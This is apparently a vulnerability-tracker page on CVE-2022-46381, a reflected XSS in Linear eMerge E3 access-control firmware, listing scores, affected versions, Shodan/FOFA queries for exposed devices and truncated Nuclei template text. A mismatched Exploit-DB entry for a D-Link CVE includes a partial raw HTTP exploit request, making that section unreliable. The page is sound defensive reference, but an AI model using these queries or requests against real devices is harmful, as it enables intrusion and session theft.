CVE-2022-46381
published 2022-12-13CVE-2022-46381: Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects…
PriorityP279medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
1.74%
74.9th percentile
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
| niceforyou | linear_emerge_e3_access_control_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Shodan query to identify exposed Linear eMerge devices: search for http.html containing 'Linear eMerge' or 'linear emerge' ↗
- →FOFA query to identify exposed Linear eMerge devices: body contains 'linear emerge' ↗
- →Attacker goal is cookie theft for session hijacking; monitor for exfiltration of cookie-based authentication credentials following XSS exploitation ↗
- ·Vulnerability affects only specific firmware versions; unaffected versions will not be exploitable ↗
- ·This is a reflected XSS (UI:R), meaning exploitation requires user interaction — a victim must click a crafted link; it is not a stored or self-triggering vulnerability ↗
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wwh4-qv5c-5223: Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e
ghsa_unreviewed·2022-12-14
CVE-2022-46381 [MEDIUM] CWE-79 GHSA-wwh4-qv5c-5223: Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
VulnCheck
niceforyou linear_emerge_e3_access_control_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2022·CVSS 6.1
CVE-2022-46381 [MEDIUM] niceforyou linear_emerge_e3_access_control_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
niceforyou linear_emerge_e3_access_control_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
Affected: niceforyou linear_emerge_e3_access_control_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-26&host_type=src&vulnerability=cve-2022-46381; https://dashboard.shadowserver.org/statistics/honeypot/
No detection rules found.
Exploit-DB
DLINK DAP-1620 A1 v1.01 - Directory Traversal
exploitdb·2022-05-11·CVSS 7.5
CVE-2021-46381 [HIGH] DLINK DAP-1620 A1 v1.01 - Directory Traversal
DLINK DAP-1620 A1 v1.01 - Directory Traversal
---
# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal
# Date: 27/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://me.dlink.com/consumer
# Version: DAP-1620 - A1 v1.01
# Tested on: Linux
# CVE : CVE-2021-46381
POST /apply.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://84.217.16.220/
Cookie: ID=634855649
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: 84.217.16.220
Connection: Keep-alive
action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_r
Nuclei
Linear eMerge E3-Series - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2022-46381 [MEDIUM] Linear eMerge E3-Series - Cross-Site Scripting
Linear eMerge E3-Series - Cross-Site Scripting
Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and thus steal cookie-based authentication credentials and launch other attacks. This affects versions 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
Template:
id: CVE-2022-46381
info:
name: Linear eMerge E3-Series - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
Linear eMerge E3-Series devices contain a cross-site scripting vulnerability via the type parameter, e.g., to the badging/badge_template_v0.php component. An att
2022-12-13
Published
Exploited in the wild